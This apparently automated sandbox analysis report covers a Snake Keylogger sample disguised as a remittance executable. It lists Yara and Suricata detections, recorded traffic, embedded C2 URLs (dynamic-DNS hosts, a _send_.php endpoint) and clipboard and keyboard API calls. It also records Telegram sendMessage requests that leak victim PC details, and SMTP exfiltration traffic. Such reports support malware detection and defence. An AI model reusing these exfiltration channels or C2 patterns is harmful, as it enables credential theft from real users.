Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.91.198.143
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.97.3:443
Source: global traffic | TCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic DNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 25 Sep 2024 13:34:23 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 25 Sep 2024 13:34:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.000000000277E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.000000000263B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBjq
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0047C81C

                  System Summary

Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
